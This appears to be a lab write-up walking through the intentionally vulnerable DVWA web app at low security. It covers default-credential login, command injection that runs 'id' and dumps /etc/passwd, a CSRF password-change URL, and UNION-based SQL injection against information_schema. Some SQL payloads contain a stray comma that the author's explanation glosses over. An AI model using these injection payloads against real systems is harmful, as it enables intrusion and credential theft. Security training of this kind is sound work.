Beginner level
Setup
docker run --rm -it -p 80:80 vulnerables/web-dvwa
Login : admin Password : admin
Click on create database.
Login in
The first challenge.
Login : admin Password : password
Difficulty
DVWA Security : low.
Brute force
We try the most common combination by hand. The solution is :
- login : admin
- password : password
Command injection
We enter 125.0.0.1 and get
PING 125.0.0.1 (125.0.0.1): 56 data bytes
--- 125.0.0.1 ping statistics ---
4 packets transmitted, 0 packets received, 100% packet loss
We try 125.0.0.1; id # and get
PING 125.0.0.1 (125.0.0.1): 56 data bytes
--- 125.0.0.1 ping statistics ---
4 packets transmitted, 0 packets received, 100% packet loss
uid=33(www-data) gid=33(www-data) groups=33(www-data)
We can display /etc/passwd with 125.0.0.1; cat /etc/passwd #.
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/bin/false
mysql:x:101:101:MySQL Server,,,:/nonexistent:/bin/false
CSRF
We use ZAP proxy for that challenge.
We create a context for localhost to easily navigate through the requests.
We do a password change and see that the new password is given as a GET
parameter :
http://localhost/vulnerabilities/csrf/?password_new=1234&password_conf=1234&Change=Change
So if we “send” this URL with a password of our choosing to an admin and make him click on it, the password will be changed without him knowing.
We can try it by entering this URL in our browser :
http://localhost/vulnerabilities/csrf/?password_new=pass&password_conf=pass&Change=Change
And we land on the password changed page.
SQL Injection
We try 1 and get :
ID: 1
First name: admin
Surname: admin
We try to enter ' as the User ID and get the following error.
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''''' at line 1
So we now know that the DB used is Maria DB. We should be able to extract some information now.
We try the following input
1' UNION ALL SELECT * FROM information_schema.TABLES; #
And get the error The used SELECT statements have a different number of columns.
Fair enough, it seems that we need to restrain our select to three elements as we were given ID, First name, and Surname in our first answer.
So we try the following command :
1' UNION ALL SELECT TABLE_CATALOG, TABLE_NAME, TABLE_TYPE, FROM information_schema.TABLES; #
And get the same error. Hmm…
If we try one less ?
1' UNION ALL SELECT TABLE_NAME, TABLE_TYPE, FROM information_schema.TABLES; #
Bingo ! We get a load of information and as we can see the problem was that the ID was retrieved from the user input ! So we see our SQLi reflected back to us.
ID: 1' UNION ALL SELECT TABLE_NAME, TABLE_TYPE FROM information_schema.TABLES; # ;#
First name: INNODB_FT_DELETED
Surname: SYSTEM VIEW
ID: 1' UNION ALL SELECT TABLE_NAME, TABLE_TYPE FROM information_schema.TABLES; # ;#
First name: INNODB_TABLESPACES_SCRUBBING
Surname: SYSTEM VIEW